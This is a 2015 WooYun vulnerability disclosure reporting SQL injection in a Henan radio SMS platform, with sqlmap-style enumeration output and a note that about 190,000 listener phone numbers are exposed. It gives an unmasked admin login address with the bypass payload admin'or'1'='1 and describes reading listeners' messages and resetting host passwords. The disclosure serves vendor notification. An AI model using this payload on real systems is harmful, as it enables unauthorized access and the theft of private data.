乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
河南广电sa权限注入(可查看所有电台短信记录+修改所有电台主持人密码)
注入点:
1.http://**.**.**/(S(bnpy3yb5u0vxv024i2zr0nze))/ShowAffiche.aspxId=16
database management system users privileges:[*] BUILTIN\\Administrators[*] sa[*] sms
available databases [10]:[*] CePing[*] MasSMS[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] SMS1[*] SMSInfo[*] tempdb
current database: 'SMSInfo'
泡一下当前库!
Database: SMSInfo[74 tables]+------------------------------+| dbo.ActManage || dbo.AfficheInfo || dbo.BY_UserInfo || dbo.BlackListInfo || dbo.CNGP_Receive || dbo.CNGP_Send || dbo.CNGP_Send_H || dbo.DictInfo || dbo.EventInfo || dbo.Keyword_Sms || dbo.LYBY_UserInfo || dbo.LY_UserInfo || dbo.Lottery_His || dbo.Lottery_Info || dbo.OperInfo || dbo.OperPurviewInfo || dbo.OperSysPermission || dbo.PhonePostionInfo || dbo.PhoneType_dic || dbo.ReceiveInfo_bak77711_16 || dbo.ReceiveInfo_bak77713 || dbo.ReceiveInfo_bak77713_16 || dbo.ReceiveInfo_bak77713_19 || dbo.SGIP_Receive || dbo.SJGB_UserInfo || dbo.SJGB_UserInfo_bak || dbo.SMS_Receive || dbo.SMS_Send || dbo.SMS_Send_H || dbo.Sms_Content || dbo.UserInfo || dbo.UserReceiveInfo || dbo.UserReceiveInfo_0819 || dbo.UserReceiveInfo_1120 || dbo.UserReceiveInfo_1124 || dbo.UserReceiveInfo_20121120 || dbo.UserReceiveInfo_777 || dbo.UserTmp1 || dbo.WXTBY_UserInfo || dbo.WzActInfo || dbo.WzInfo || dbo.WzSearchUserInfo || dbo.YB_UserInfo || dbo.ceshi || dbo.cpsp_106262965_56 || dbo.cpsp_receive || dbo.cpsp_send || dbo.cpsp_send_bak || dbo.cpsp_send_h || dbo.dtproperties || dbo.pysp || dbo.pysp_h || dbo.sgip_106262965_56 || dbo.sgip_send || dbo.sgip_send_h || dbo.sjtgb_menu || dbo.sjtgb_user || dbo.sms_106262965_56 || dbo.sms_provision || dbo.sms_time || dbo.svctype_sgip || dbo.sysconstraints || dbo.syssegments || dbo.test || dbo.tmp_1 || dbo.tmp_2 || dbo.tmp_3 || dbo.tmp_phone || dbo.tmp_phone11 || dbo.userReceiveInfo_0414 || dbo.userReceiveInfo_Temp || dbo.wmpx || dbo.wzcx_user || dbo.zypx |+------------------------------+
Database: SMSInfoTable: dbo.UserReceiveInfo[9 columns]+------------+----------+| Column | Type |+------------+----------+| ActId | int || CreateTime | datetime || Id | int || IsLooked | int || Phone | varchar || Port | varchar || SMSContent | varchar || Status | int || type | int |+------------+----------+
可以看到有19万多的手机号。好了,就到这里吧。不跑数据了!时间。
后台
http://219.156.123.188:8080/(S(bnpy3yb5u0vxv024i2zr0nze))/Login.aspx
账号admin'or'1'='1密码随便
所有河南电台
修改主持人密码
随便点击一个电台,就河南综合电台
可以看到所有听众的短信!
危害等级:高
漏洞Rank:12
确认时间:2015-07-14 16:04
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。
暂无